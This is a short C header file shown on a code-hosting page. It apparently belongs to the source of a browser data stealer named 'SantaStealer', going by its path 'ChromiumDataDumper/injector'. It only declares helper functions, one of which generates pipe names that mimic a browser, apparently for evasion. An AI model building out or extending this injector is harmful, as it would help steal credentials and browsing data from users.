Files
SantaStealerSRC/ChromiumDataDumper/injector/include/utils.h
T

10 lines
300 B
C
Raw Normal View History

2026-08-27 11:22:14 -06:00
#ifndef INJECTOR_UTILS_H
#define INJECTOR_UTILS_H
#include "types.h"
bool generate_browser_mimic_pipe_name(const wchar_t* browser_type, wchar_t* pipe_name, size_t len);
bool create_directory_recursive(const wchar_t* path);
bool file_exists(const wchar_t* path);
#endif // INJECTOR_UTILS_H